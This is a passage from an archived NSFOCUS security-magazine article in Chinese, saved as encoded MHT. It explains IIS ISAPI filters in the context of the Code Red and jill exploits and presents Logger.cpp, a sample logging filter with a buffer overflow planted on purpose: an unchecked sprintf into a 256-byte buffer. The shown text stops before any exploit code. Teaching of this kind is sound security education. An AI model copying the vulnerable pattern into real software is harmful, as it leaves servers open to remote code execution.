From: <ÓÉ Microsoft Internet Explorer 5 ±£´æ> Subject: =?gb2312?B?wszDy7/GvLwtLXd3dy5uc2ZvY3VzLmNvbS0twszDy9TCv68=?= Date: Wed, 1 Oct 2003 00:40:12 +0800 MIME-Version: 1.0 Content-Type: multipart/related; boundary="----=_NextPart_000_0077_01C387B4.93214500"; type="text/html" X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165 This is a multi-part message in MIME format. ------=_NextPart_000_0077_01C387B4.93214500 Content-Type: text/html; charset="gb2312" Content-Transfer-Encoding: quoted-printable Content-Location: http://www.nsfocus.net/index.php?act=magazine&do=view&mid=1662 =C2=CC=C3=CB=BF=C6=BC=BC--www.nsfocus.com--=C2=CC=C3=CB= =D4=C2=BF=AF
3DTitle=20
3DLeft 3DRight
 
=C2=CC=C3=CB=B0=B2=C8=AB=D4=C2=BF=AF->=B5=DA37=C6=DA->=BC=BC=CA=F5=D7=A8=CC=E2
=C6=DA=BF=AF=BA=C5=A3=BA =C0=E0=D0=CD=A3=BA=20 = =B9=D8=BC=FC=B4=CA=A3=BA =20 =20
=B5=DA=CE=E5=D5=C2 Exploit Microsoft = INTERNET INFORMATION=20 SERVER

=D7=F7=D5=DF=A3=BA=C4=AA=B4=F3=20 = <master_moda@yahoo.com>
=C8=D5=C6=DA=A3=BA2002-12-02

=D2=FD= =D7=D3=A3=BA


=CE=D2=C0=CF=D4=E7=BE=CD=CF=EB=D1=D0=BE=BF=D2=BB=CF= =C2=D5=EB=B6=D4Microsoft=20 Internet Information=20 = Server=B5=C4=B8=F7=D6=D6Exploit=A3=AC=D2=B2=D7=C5=CA=D6=CA=D5=BC=AF=C1=CB= =B2=BB=C9=D9Exploit=B5=C4=BA=DA=BF=CD=C2=EB=A3=AC=B5=AB=CA=C7=C8=B4=BE=B2= =B2=BB=CF=C2=D0=C4=C0=B4=D2=BB=B2=BD=D2=BB=B2=BD=C8=A5Disassembly=D5=E2=D0= =A9=BA=DA=BF=CD=C2=EB=A3=AC=D2=BB=D6=B1=B5=BD=CE=D2=B5=C4=BC=C6=CB=E3=BB=FA= =C3=C7=B1=BBCodeRed=B9=A5=BB=F7=B5=C4=C4=C7=CC=EC=A1=A3=B4=F3=B2=BF=B7=D6= =BC=C6=CB=E3=BB=FA=B6=BC=C3=BB=D3=D0=CE=CA=CC=E2=A3=AC=B5=AB=CA=C7=D3=D0=C4= =C7=C3=B4=BC=B8=B8=F6=BC=C6=CB=E3=BB=FA=B8=D5=B1=BBCodered=D5=BC=C1=EC=A3= =AC=D5=FD=D4=DA=CF=F2=CB=E6=BB=FAIP=B5=D8=D6=B7=B7=A2=B3=F6=D2=BB=B8=F6=D3= =D6=D2=BB=B8=F6=B5=C4HTTP=C7=EB=C7=F3=A3=BB=BB=B9=D3=D0=D2=BB=B8=F6=BC=C6= =CB=E3=BB=FA=B4=F3=B8=C5=B5=BD=C1=CBCodered=CD=ED=C6=DA=A3=AC=CE=D2=BE=D3= =C8=BB=D4=DA=C9=CF=C3=E6=D5=D2=B5=BD=D2=BB=B8=F6=BD=D0=D7=F7root.exe=B5=C4= =C4=BE=C2=ED(Trojan)=B3=CC=D0=F2=A1=A3=B7=B4=D5=FD=D5=DB=CC=DA=C1=CB=BA=C3= =BE=C3=BA=C3=BE=C3=A3=AC=D6=D5=EC=B6=B0=D1Codered=C9=A8=B3=F6=C1=CB=B4=F3= =C3=C5=A1=A3=CD=B4=B6=A8=CB=BC=CD=B4=A3=AC=CE=D2=D6=D5=EC=B6=BE=F6=B6=A8=C6= =F8=B3=C1=B5=A4=CC=EF=A3=AC=BE=DB=BE=AB=BB=E1=C9=F1=D2=BB=B4=CE=C8=A5Disa= ssembly=D5=E2=D0=A9=B2=A1=B6=BE/=B2=A1=B3=E6=A1=A3

=C4=C7=D2=BB=B6= =CE=CA=B1=BC=E4=D6=F7=D2=AA=D1=D0=BE=BF=C1=CB=C1=BD=B8=F6Exploit=B3=CC=D0= =F2=A3=AC=B5=DA=D2=BB=B8=F6=B5=B1=C8=BB=BE=CD=CA=C7Codered=A3=AC=D5=E2=B8= =F6=C2=EB=CB=E4=C8=BB=B1=C8=BD=CF=B3=A4=A3=AC=B5=AB=CA=C7=B6=D4=D5=D5=D2=BB= =CF=C2eeye(http://www.eeye.com)=B5=C4=CB=B5=C3=F7=BB=B9=CA=C7=BF=C9=D2=D4= =B8=E3=C7=E5=B3=FE=CB=FC=B5=C4=D4=CB=D7=F7=B7=BD=CA=BD=A1=A3=CF=D6=D4=DA=B4= =F3=BC=D2=D2=B2=B6=BC=D6=AA=B5=C0=C1=CB=A3=ACIIS=D3=C3=B5=BD=C1=CB=D2=BB=B8= =F6=B6=AF=CC=AC=C1=AA=BD=E1=BF=E2idq.dll=A3=AC=D5=E2=B8=F6idq.dll=CA=C7=CC= =E1=B9=A9Index=B7=FE=CE=F1=B5=C4ISAPI=20 = Extension=A3=BBCodered=BE=CD=C0=FB=D3=C3=D5=E2=B8=F6dll=D6=D0=B5=C4=BB=BA= =B3=E5=C7=F8=D2=E7=B3=F6=C0=B4=D4=CB=D0=D0=CB=FC=B5=C4=BA=DA=BF=CD=C2=EB=A3= =AC=BD=F8=B6=F8=C8=A5=B4=AB=C8=BE=B8=FC=B6=E0=B5=C4=BC=C6=CB=E3=BB=FA=A1=A3= =B5=DA=B6=FE=B8=F6Exploit----jill=B2=BB=CC=AB=D3=D0=C3=FB=A3=AC=D2=F2=CE=AA= =CB=FC=C3=BB=D3=D0=A1=B0=C9=FA=D6=B3=B9=A6=C4=DC=A1=B1=A3=AC=B2=BB=C4=DC=D7= =D4=CE=D2=B8=B4=D6=C6=C8=A5=B4=AB=C8=BE=C6=E4=CB=FC=B5=C4=BC=C6=CB=E3=BB=FA= =A3=AC=CB=FC=C0=FB=D3=C3=C1=CB=C1=ED=CD=E2=D2=BB=B8=F6=B6=AF=CC=AC=C1=AA=BD= =E1=BF=E2msw3prt.dll=B5=C4=BB=BA=B3=E5=C7=F8=D2=E7=B3=F6=C8=A5=D4=CB=D0=D0= =CB=FC=B5=C4=BA=DA=BF=CD=C2=EB=A3=BB=D5=E2=B8=F6msw3prt.dll=CA=C7=CA=B5=CF= =D6=CD=F8=C2=E7=B4=F2=D3=A1=D0=AD=D2=E9(Internet=20 Printing Protocol)=B5=C4ISAPI=20 = Extension=A1=A3=C1=ED=CD=E2=D4=DAhttp://www.eeye.com=CD=F8=D5=BE=C9=CF=BB= =B9=D3=D0=D2=BB=B8=F6=D2=B2=CA=C7=D5=EB=B6=D4msw3prt.dll=BB=BA=B3=E5=C7=F8= =D2=E7=B3=F6=B5=C4=B1=C8=BD=CF=BC=F2=B5=A5=B5=C4Exploit=A3=AC=CE=D2=BD=A8= =D2=E9=C4=E3=C3=C7=B2=BB=B7=C1=D2=B2=BF=B4=BF=B4=A1=A3

=D4=DA=B7=D6= =CE=F6=CD=EA=D5=E2=C1=BD=B8=F6Exploit=BA=F3=A3=AC=CE=D2=B3=A2=CA=D4=D7=C5= =C8=E0=BA=CF=C1=CB=CB=FC=C3=C7=B5=C4=D2=BB=D0=A9Exploit=BC=BC=C7=C9=A3=AC= =D4=D9=BC=D3=C9=CF=CE=D2=D7=D4=BC=BA=B5=C4=D2=BB=D0=A9=CF=EB=B7=A8=D7=F7=C1= =CB=CF=C2=C3=E6=D2=BB=B8=F6Exploit=A3=AC=CF=A3=CD=FB=B4=F3=BC=D2=BF=B4=C1= =CB=D2=D4=BA=F3=C4=DC=B9=BB=B6=D4=D5=E2=D6=D6=C0=E0=D0=CD=B5=C4=BA=DA=BF=CD= =C2=EB=D3=D0=D2=BB=B8=F6=B3=F5=B2=BD=C1=CB=BD=E2=A1=A3


ISAPI=20 = =B1=B3=BE=B0=D6=AA=CA=B6=BD=E9=C9=DC=A3=BA


=CF=C8=C0=B4=D2=BB=B5= =E3Internet Service=20 = API=B5=C4=BC=F2=BD=E9=A3=AC=C8=E7=B9=FB=C4=E3=C3=C7=D2=D1=BE=AD=CA=EC=CF=A4= =D5=E2=B7=BD=C3=E6=B5=C4=C4=DA=C8=DD=A3=AC=C7=EB=CC=F8=B5=BD=CF=C2=C3=E6<= BR>=D2=BB=BD=DA=A1=A3

=B4=F3=BC=D2=D6=AA=B5=C0=A3=AC=D7=F7=CE=AAWo= rld Wide=20 Web=B5=C4=D6=D8=D2=AA=D2=BB=BB=B7=A3=ACWeb=20 = Server=CE=AAHTTP=C7=EB=C7=F3=CC=E1=B9=A9=B7=FE=CE=F1=A3=AC=D7=EE=B3=F5=CB= =FC
=D6=BB=CA=C7=B7=B5=BB=D8=BC=F2=B5=A5=B5=C4=B9=CC=CC=ACHTML=CE=C4=BC= =FE=A3=AC=D2=D4=BA=F3=CB=E6=D7=C5=CD=F8=C2=E7=D6=F0=BD=A5=C9=EE=C8=EB=B5=BD= =B8=F7=B8=F6=C1=EC=D3=F2=A3=AC=CB=E6=D7=C5=D4=BD=B4=B5=D4=BD=B4=F3=B5=C4<= BR>.COM=C5=DD=C5=DD=A3=AC=B6=D4Web=20 = Server=B5=C4=D2=AA=C7=F3=D2=B2=D4=BD=C0=B4=D4=BD=B6=E0=A3=BA=D2=AA=CB=FC=CC= =E1=B9=A9=B6=AF=CC=AC=B5=C4=CD=F8=D2=B3(=CF=F3Microsoft=B5=C4
ASP)=A3=AC= =D2=AA=CB=FC=C4=DC=D6=A7=B3=D6=CD=F8=C2=E7=B4=F2=D3=A1=D0=AD=D2=E9(Intern= et=20 Printing=20 = Protocol)=A3=AC=D2=AA=CB=FC=CC=E1=B9=A9=BC=D3=C3=DC=BD=E2=C3=DC=B9=A6=C4=DC= =B5=C8=B5=C8=B5=C8=B5=C8=A3=AC=B6=F8=C7=D2=D5=E2=D0=A9=D2=AA=C7=F3=BD=AB=C0= =B4=BB=B9=BB=E1=BC=CC=D0=F8=D4=F6=BC=D3=A1=A3=D4=F5=D1=F9=B2=C5=C4=DC=D3=A6= =B8=B6=D5=E2=D0=A9=CE=E5=BB=A8=B0=CB=C3=C5=B5=C4=D2=AA=C7=F3=C4=D8=A3=BF=BA= =DC=CF=D4=C8=BB=B5=C4=D2=BB=B2=BD=BE=CD=CA=C7=B0=D1=B7=FE=CE=F1=D5=E2=D0=A9= =D2=AA=C7=F3=B5=C4=B4=FA=C2=EB=D3=EBWeb=20 = Server=D6=D0=B7=D6=C0=EB=B3=F6=C8=A5=A3=AC=B0=D1=CB=FC=C3=C7=C4=A3=BF=E9=BB= =AF=A1=A3=B5=B1Web=20 = Server=CA=D5=B5=BD=D5=E2=D0=A9=CE=E5=BB=A8=B0=CB=C3=C5=B5=C4HTTP=C7=EB=C7= =F3=CA=B1=A3=AC=CB=FC=B2=A2=B2=BB=B4=A6=C0=ED=A3=AC=B6=F8=CA=C7=B0=D1=D5=E2= =D0=A9HTTP=C7=EB=C7=F3=D7=AA=B8=F8=B6=D4=D3=A6=D3=DA=D5=E2=B8=F6=C7=EB=C7= =F3=B5=C4=C4=A3=BF=E9=B4=A6=C0=ED=A1=A3=D5=E2=D1=F9=B5=C4=BA=C3=B4=A6=D4=DA= =D3=DA=C3=BF=D4=F6=BC=D3=D2=BB=B8=F6=D0=C2=B5=C4=D2=AA=C7=F3=A3=AC=BE=CD=BF= =C9=D2=D4=BA=DC=B7=BD=B1=E3=B5=D8=D4=F6=BC=D3=D2=BB=B8=F6=C4=A3=BF=E9=C2=FA= =D7=E3=CB=FC=A3=AC=B6=F8Web=20 = Server=B2=BB=D0=E8=D2=AA=D3=D0=B8=C4=B6=AF=A1=A3=C1=ED=CD=E2=D2=BB=B8=F6=BA= =C3=B4=A6=CA=C7=BF=C9=D2=D4=C8=C3=D5=E2=D0=A9=C4=A3=BF=E9=D4=DA=B2=BB=CD=AC= =D3=DAWeb=20 = Server=B5=C4=BD=F8=B3=CC=D6=D0=D4=CB=D0=D0=A3=AC=BC=C8=D4=F6=BC=D3=C1=CB=B0= =B2=C8=AB=D0=D4=A3=AC=D2=B2=D4=F6=BC=D3=C1=CBScalability=A1=A3=B5=B1=C8=BB= =A3=AC=D5=E2=D0=A9=C4=A3=BF=E9=D0=E8=D2=AA=B0=B4=D5=D5=B9=E6=B6=A8=BA=C3=B5= =C4=BD=E7=C3=E6=C0=B4=B1=E0=D0=B4=A3=AC=B6=D4=D3=DAMicrosoft=20 Web = Server=C0=B4=CB=B5=A3=AC=D5=E2=D0=A9=BD=E7=C3=E6=BE=CD=CA=C7Internet = Service=20 = API(ISAPI)=A1=A3

Microsoft=B5=C4ISAPI=D3=D0=C1=BD=D6=D6=A3=BAISAPI= Extension=BA=CDISAPI=20 Filter=A1=A3=B9=CB=C3=FB=CB=BC=D2=E5=A3=ACISAPI =
Extension=CA=C7Web=20 = Server=B5=C4=B9=A6=C4=DC=C0=A9=D5=B9=A3=AC=CB=FC=C4=DC=B6=C0=C1=A2=D6=A7=B3= =D6=C4=B3=D2=BB=CF=EEHTTP=C7=EB=C7=F3=A3=AC=B1=C8=C8=E7.printer=D6=A7=B3=D6=
=CD=F8=C2=E7=B4=F2=D3=A1=D0=AD=D2=E9=B5=C4=C7=EB=C7=F3=A3=BB=B6=F8ISA= PI=20 Filter=D0=E8=D2=AA=D2=C0=B8=BD=D3=DAWeb=20 = Server=A3=AC=CB=FC=B2=A2=B2=BB=B6=C0=C1=A2=D6=A7=B3=D6HTTP=C7=EB
=C7=F3= =A3=AC=B6=F8=CA=C7=B8=E3=D0=A9=C0=B4=C1=CF=BC=D3=B9=A4=B5=C4=D4=D3=CA=C2=A3= =AC=B1=C8=C8=E7=CB=B5=B6=D4=CA=FD=BE=DD=BD=E2=C3=DC=A1=A2=BC=D3=C3=DC=D1=BD= =A3=AC=B6=D4HTTP=C7=EB=C7=F3=BD=F8=D0=D0=BC=C7=C2=BC
(log)=D1=BD=CA=B2= =C3=B4=B5=C4=A1=A3

=D5=E2=C1=BD=D6=D6ISAPI=B6=BC=B1=E0=D2=EB=B3=C9= =B6=AF=CC=AC=C1=AA=BD=E1=BF=E2(dll)=A3=AC=C6=E4=D6=D0ISAPI=20 Extension=B5=C4dll=BC=C8=BF=C9=D2=D4=D4=D8=C8=EBWeb = Server=BD=F8=B3=CC=D6=D0=D4=CB=D0=D0=A3=AC=D2=B2=BF=C9=D2=D4=D4=D8=C8=EB=B6= =C0=C1=A2=D3=DAWeb=20 = Server=CD=E2=B5=C4=BD=F8=B3=CC=D6=D0=D4=CB=D0=D0----=D5=E2=CA=C7=BF=C9=D2= =D4=C0=ED=BD=E2=B5=C4=A3=AC=B1=CF=BE=B9ISAPI=20 = Extension=B9=A6=C4=DC=CF=E0=B6=D4=B8=B4=D4=D3=A3=AC=D0=E8=D2=AA=D3=C3=B5=C4= CPU=CA=B1=BC=E4=A1=A2=C4=DA=B4=E6=B6=BC=B6=E0=A3=AC=B9=BB=B5=C3=C9=CF=BC=B6= =B1=F0=CF=ED=CA=DC=D2=BB=B8=F6=B6=C0=C1=A2=B5=C4=BD=F8=B3=CC=A3=BBISAPI=20 = Extension=BB=B9=D3=D0=B5=DA=C8=FD=D6=D6=D4=CB=D0=D0=C4=A3=CA=BD=BD=D0Pool= ed Application Protection=20 = Model=A3=AC=C4=C7=CA=C7=C7=B0=C1=BD=D6=D6=C4=A3=CA=BD=CF=E0=BB=A5=CD=D7=D0= =AD=B5=C4=B2=FA=CE=EF=A3=AC=CE=D2=BE=CD=C0=C1=B5=C3=C8=A5=CB=B5=CB=FC=C1=CB= =A1=A3=B6=F8ISAPI = Filter=CF=E0=B6=D4=C0=B4=CB=B5=BB=B9=CA=C7=BC=F2=B5=A5=A3=AC=CB=FC=B5=C4d= ll=D6=BB=C4=DC=D4=D8=C8=EBWeb=20 Server=BD=F8=B3=CC=D6=D0=A3=AC=B9=B2=CF=EDWeb=20 = Server=D3=D0=CF=DE=B5=C4=D7=CA=D4=B4=A1=A3

=C8=E7=B9=FB=C4=E3=CF=F3= =CE=D2=D2=BB=D1=F9=A3=AC=D3=C3C++=C0=B4=B1=E0=D0=B4ISAPI=B3=CC=D0=F2=A3=AC= =B6=F8=B2=BB=D3=C3Microsoft Foundation=20 Class=A3=AC=C4=C7=C3=B4
=C4=E3=B5=C4ISAPI=20 = Extension=B1=D8=D0=EB=CA=B5=CF=D6(Implement)=D2=D4=BC=B0=CA=E4=B3=F6(Expo= rt)=C8=FD=B8=F6=BA=AF=CA=FD=A3=BA
    GetExtension= Version,=20
    HttpExtensionProc,=20 =
    TerminateExtension=A1=A3
=D3=EB=B4=CB=C0=E0= =CB=C6=A3=ACISAPI=20 = Filter=D2=B2=B1=D8=D0=EB=CA=B5=CF=D6=D2=D4=BC=B0=CA=E4=B3=F6=C8=FD=B8=F6=BA= =AF=CA=FD=A3=BA
    GetFilterVersion,=20
    HttpFilterProc,=20 =
    TerminateFilter=A1=A3

=B2=BB=C2=DB=CA=C7= =C4=E3=D7=D4=BC=BA=B1=E0=D0=B4=B1=E0=D2=EB=B5=C4ISAPI=B6=AF=CC=AC=C1=AA=BD= =E1=BF=E2=A3=AC=BB=B9=CA=C7=C2=F2=C0=B4=B5=C4ISAPI=B6=AF=CC=AC=C1=AA=BD=E1= =BF=E2=A3=AC=B6=BC=D0=E8=D2=AA=D4=DA
Internet=20 Service = manager=D6=D0=B0=D1=CB=FC=C3=C7=B6=A8=D2=E5=D2=D4=BA=F3=B2=C5=C4=DC=B1=BB= Microsoft Web=20 = Server=CA=B9=D3=C3=A1=A3=CE=D2=B5=C4
=BB=FA=C6=F7Dallas=D4=CB=D0=D0Win= dows 2000 Server=A3=AC=D4=DAdallas=C9=CF=B6=A8=D2=E5ISAPI=20 = Extension=B5=C4=B2=BD=D6=E8=CA=C7=A3=BA
Start
   &nb= sp;=3D> Programs=20 =
        =3D>Administrative= =20 Tools=20 =
           &nb= sp;=3D>Internet=20 Service Manager
=D4=DAInternet Service = Manager=C6=F4=B6=AF=BA=F3=A3=AC=D3=D2=BB=F7(Right Click)=20 Default Web Site
    =3D> = =D1=A1Properties=20 =
        =3D>Home=20 Directory=20 =
           &nb= sp;=3D>Application=20 Setting
=D4=DAApplication = Setting=D6=D0=B5=E3=BB=F7Configuration=A3=AC=C4=E3=BF=C9=D2=D4=BF=B4=B5=BD= =D2=BB=B4=F3=B6=D1=B5=C4Application=20 Mapping=A3=AC=B0=FC=C0=A8=B1=BBCodered=20 = Exploit=B5=C4.ida/.idq=B5=C4=B6=A8=D2=E5=D2=D4=BC=B0=B1=BBjill=CB=F9Explo= it=B5=C4.printer=B5=C4=B6=A8=D2=E5=A3=BB=C4=E3=BE=CD=D4=DA=D5=E2=C0=EF=D4= =F6=BC=D3=A1=A2=C9=BE=BC=F5=BB=F2=D0=DE=B8=C4=C4=E3=B5=C4ISAPI=20 Extension=B6=A8=D2=E5=A1=A3

=B6=A8=D2=E5ISAPI = Filter=B5=C4=B2=BD=D6=E8=D3=EB=B4=CB=C0=E0=CB=C6=A3=AC=D4=DAInternet = Service=20 Manager=C6=F4=B6=AF=BA=F3=A3=AC=D3=D2=BB=F7(Right Click) = Default Web Site=20
    =3D> =D1=A1Properties=20 =
        =3D>ISAPI=20 = Filters
=C4=E3=BE=CD=D4=DA=D5=E2=C0=EF=D4=F6=BC=D3=A1=A2=C9=BE=BC=F5=BB= =F2=D0=DE=B8=C4=C4=E3=B5=C4ISAPI=20 = Filter=B6=A8=D2=E5=A1=A3

=D2=D4=C9=CF=CA=C7=B9=D8=D3=DAISAPI=B5=C4= =BC=F2=BD=E9=A3=AC=C6=E4=CA=B5ISAPI=D2=B2=BE=CD=D5=E2=C3=B4=D2=BB=B5=E3=B5= =E3=B6=AB=CE=F7=A3=AC=B2=BB=CF=E0=D0=C5=B5=C4=BB=B0=C4=E3=C3=C7=BF=C9=D2=D4= =C8=A5=CD=F8=C9=CF=A1=A2
=CA=E9=C9=CF=B2=E9=B2=E9=BF=B4=A1=A3=CB=B5=B5= =BD=D5=E2=C0=EF=A3=AC=CE=D2=CF=EB=C6=F0=D2=BB=B8=F6=CA=C2=C0=B4=A3=AC=D3=D0= =D2=BB=B6=CE=CA=B1=BC=E4=CE=D2=D4=DAWindows=BB=FA=C6=F7=C9=CF=B5=F7=CA=D4= =D2=BB=B8=F6=BD=D0Siteminder=B5=C4=C8=ED=BC=FE=B0=FC=A3=AC=CB=FC=CA=C7=D2= =BB=B8=F6=BD=D0NETEGRITY=B5=C4=B9=AB=CB=BE=B1=E0=D0=B4=B5=C4=A3=AC=D3=C3=D3= =DA=B1=A3=BB=A4=CD=F8=D5=BE=B5=C4=B0=B2=C8=AB=A1=A3=CE=D2=D3=A1=CF=F3=D6=D0= =B5=C4=CB=FC=BE=CD=CA=C7=CA=B9=D3=C3ISAPI=20 Filter=A3=AC=CB=FC=D4=DAMicrosoft=B5=C4Web=20 = Server=B4=A6=C0=ED=C8=CE=BA=CEHTTP=C7=EB=C7=F3=D6=AE=C7=B0=A3=AC=CF=C8=B0= =D1=D5=E2=B8=F6=C7=EB=C7=F3=C0=B9=BD=D8=CF=C2=C0=B4=A3=AC=BC=EC=B2=E9=D2=BB= =CF=C2=B7=A2=B3=F6=D5=E2=B8=F6=C7=EB=C7=F3=B5=C4Client=C4=DC=B7=F1=B1=BBA= uthenticated=A1=A2=D5=E2=B8=F6Client=CA=C7=B7=F1=D3=D0=D7=E3=B9=BB=B5=C4=C8= =A8=CF=DE=B7=C3=CE=CA=C4=B3=B8=F6=CD=F8=D2=B3=A1=A2=B1=BB=B7=C3=CE=CA=B5=C4= =CD=F8=D2=B3=CA=C7=B7=F1=B4=E6=D4=DA=B5=C8=B5=C8=A1=A3=CE=D2=B5=B1=CA=B1=B6= =D4=D5=E2=B8=F6Siteminder=B5=C4=B8=D0=BE=F5=CA=C7=A3=BA=B2=BB=C2=DB=CA=C7= =C9=E8=D6=C3=BB=B9=CA=C7=B1=E0=D0=B4=A3=AC=B6=BC=B2=BB=BB=E1=BA=DC=C0=A7=C4= =D1=A1=A3=BA=F3=C0=B4=CE=D2=D4=DA=D2=BB=B8=F6=C7=F3=D6=B0=CD=F8=D5=BE=C9=CF= =C8=B4=BF=B4=B5=BD=D3=D0=B5=C4=B9=AB=CB=BE=B8=DF=D0=BD=C6=B8=C7=EB=C9=E8=D6= =C3Siteminder=B5=C4=BC=BC=CA=F5=C8=CB=D4=B1(=BA=CF=CD=AC=B9=A4)=A3=AC=B8=B6= =B5=C4=C7=AE=BB=B9=B2=BB=C9=D9=A3=AC=BA=C3=CF=F3=CA=C7$10000=C3=C0=D4=AA/= =D4=C2=D7=F3=D3=D2----=D5=E6=CA=C7=D0=A6=BB=B0=A3=A1=C4=E3=C3=C7=BF=B4=BF= =B4=C3=C0=B9=FA=B9=AB=CB=BE=B5=C4=C7=AE=BB=B9=CA=C7=BA=DC=BA=C3=D5=F5=B5=C4= =B0=C9=A3=A1


Vulerable=20 ISAPI = Filter


=D5=E2=D2=BB=D5=C2=CE=D2=BD=AB=D6=C6=D7=F7=D2=BB=B8=F6=BC= =F2=B5=A5=B5=C4ISAPI=20 = Filter=A3=AC=CB=FC=CE=A8=D2=BB=B5=C4=B9=A6=C4=DC=BE=CD=CA=C7=B6=D4HTTP=C7= =EB=C7=F3=BD=F8=D0=D0=BC=C7=C2=BC(Logging)=A3=AC=CE=D2=D4=DA=D5=E2=B8=F6I= SAPI=20 = Filter=D6=D0=C9=E8=D6=C3=C1=CB=D2=BB=B8=F6Buffer=D2=E7=B3=F6=B5=C4=C8=B1=CF= =DD=A1=A3=BA=C3=A3=A1=CF=D0=BB=B0=C9=D9=CB=B5=A3=AC=C7=E5=CC=B8=CE=F3=B9=FA= =A3=AC=CF=C2=C3=E6=BE=CD=CA=C7=D5=E2=B8=F6ISAPI=20 = Filter----Logger.cpp=A3=BA


<=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3DLogger.cpp=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D>

#inc= lude=20 <windows.h>
#include <stdio.h>
#include=20 <stdlib.h>
#include <httpfilt.h>
#include=20 <EXCPT.H>
#include = <WTYPES.H>



BOOL=20 APIENTRY DllMain( HANDLE hModule,=20 =
           &nb= sp;          =20 DWORD  ul_reason_for_call,=20 =
           &nb= sp;          =20 LPVOID=20 = lpReserved
          = ;          =20 )
{
    return = TRUE;
}


BOOL=20 WINAPI  __stdcall =
GetFilterVersion(HTTP_FILTER_VERSION=20 * pVer)
{
    //set the flags and = request=20 the notications that we need for this to=20 work

     pVer->dwFlags=20 =3D     (SF_NOTIFY_SECURE_PORT=20 = |
           &n= bsp;           &nb= sp;  =20 SF_NOTIFY_NONSECURE_PORT=20 = |
           &n= bsp;           &nb= sp;  =20 SF_NOTIFY_ORDER_LOW=20 = |
           &n= bsp;           &nb= sp;  =20 //SF_NOTIFY_SEND_RESPONSE=20 = |
           &n= bsp;           &nb= sp;  =20 //SF_NOTIFY_END_OF_NET_SESSION=20 = |
           &n= bsp;           &nb= sp;  =20 SF_NOTIFY_LOG=20 =
           &nb= sp;           &nbs= p;  =20 );

    pVer->dwFilterVersion = =3D=20 HTTP_FILTER_REVISION;
    strcpy(=20 pVer->lpszFilterDesc, "Server Type=20 Changer");
    return = TRUE;
}

DWORD=20 WINAPI   = __stdcall
HttpFilterProc(HTTP_FILTER_CONTEXT *=20 pfc, DWORD=20 = notificationType,
        &nbs= p;         VOID=20 *=20 = pvNotification)
{

    PHTTP_FILTER_LOG=20 = pLogData;
    OutputDebugString("Entered=20 HttpFilterProc\n");    =20

    switch=20 = (notificationType)
    {
   &nbs= p;    =20 case=20 = SF_NOTIFY_LOG:
         &= nbsp;  {         &= nbsp;      
    &nbs= p;       =20 = OutputDebugString("HttpFilterProc:Logging\n");    =20 =
           &nb= sp;=20 =
           &nb= sp;=20 TCHAR=20 = sz[256];

         &nb= sp;    pLogData=20 =3D=20 = (PHTTP_FILTER_LOG)pvNotification;
      =         sprintf(sz,=20 "Client Machine: %s , Username: %s, Server\=20 =
           &nb= sp;    Machine:=20 %s, Target Path: %s\n",=20 = \
           &n= bsp;=20 = pLogData->pszClientHostName,pLogData->pszClientUserName,\=20 =
           &nb= sp;    pLogData->pszServerName,=20 = pLogData->pszTarget  );
     &nb= sp;          
 =            }
&n= bsp;       =20 break;
        =20 = default:
          &= nbsp; =20 = OutputDebugString("HttpFilterProc:Default\n");    =20
        =20 break;

    =20 }


     return=20 = SF_STATUS_REQ_NEXT_NOTIFICATION;
}
    
&nbs= p; =20 =
<=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D>


=CB=FC=CA=E4=B3= =F6=C1=BD=B8=F6=BA=AF=CA=FD=A3=BA=20 = =B5=DA=D2=BB=B8=F6=BA=AF=CA=FDGetFilterVersion=B8=E6=CB=DFIIS=CB=FC=B6=D4= =B7=A2=C9=FA=D4=DASECURE_PORT(=B0=B2=C8=AB
=B6=CB=BF=DA)=D2=D4=BC=B0NO= NSECURE_PORT(=B7=C7=B0=B2=C8=AB=B6=CB=BF=DA)=B5=C4=CA=C2=BC=FESF_NOTIFY_L= OG=B8=D0=D0=CB=C8=A4=A3=AC=D5=E2=D1=F9IIS=D4=DA=D7=F7
HTTP=BC=C7=C2=BC= (logging)=C7=B0=BE=CD=B1=D8=D0=EB=CD=A8=D6=AA=CE=D2=C3=C7=D5=E2=B8=F6Filt= er=A3=BB=D5=E2=B8=F6Filter=BE=DF=D3=D0=B5=CD=D3=C5=CF=C8=BC=B6----=20 = SF_NOTIFY_ORDER_LOW()=A3=AC=D2=B2=BE=CD=CA=C7=CB=B5=A3=AC=C8=E7=B9=FBIIS=BB= =B9=D3=D0=C6=E4=CB=FB=B5=C4=BD=CF=B8=DF=D3=C5=CF=C8=BC=B6=B5=C4Filter=A3=AC= IIS=BB=E1=D3=C5=CF=C8=CD=A8=D6=AA=BD=CF=B8=DF=D3=C5=CF=C8=BC=B6=B5=C4Filt= er=A3=AC=C8=C3=C4=C7=D0=A9Filter=CF=C8=D6=B4=D0=D0=A3=AC=C8=BB=BA=F3=B2=C5= =C2=D6=B5=BD=CE=D2=C3=C7=B5=C4Filter=A1=A3=B5=B1=CE=D2=C3=C7=B5=C4Filter=D7= =EE=D6=D5=BD=D3=CA=D5=B5=BDIIS=B5=C4=CD=A8=D6=AA=CA=B1=A3=AC=BE=CD=D3=C9=B5= =DA=B6=FE=B8=F6=CA=E4=B3=F6=BA=AF=CA=FDHttpFilterProc=B8=BA=D4=F0=B4=A6=C0= =ED=A1=A3=C4=E3=C3=C7=BF=C9=D2=D4=BF=B4=B5=BD=A3=AC=D4=DAHttpFilterProc=B6= =D4=CA=C2=BC=FESF_NOTIFY_LOG=B5=C4=B4=A6=C0=ED=D6=D0=A3=AC=D3=C3=C1=CB=B2= =BB=B0=B2=C8=AB=B5=C4=BA=AF=CA=FDsprintf=A3=AC=D5=E2=B8=F6=BA=AF=CA=FD=B2= =BB=BC=EC=B2=E9=CA=E4=C8=EB=B2=CE=CA=FD=B5=C4=B3=A4=B6=C8=A3=AC=D6=BB=D6=AA= =B5=C0=D2=BB=B8=F6=BE=A2=B5=D8=CD=F9=BB=BA=B3=E5=C7=F8sz=B3=E4=CC=EE=B8=F1= 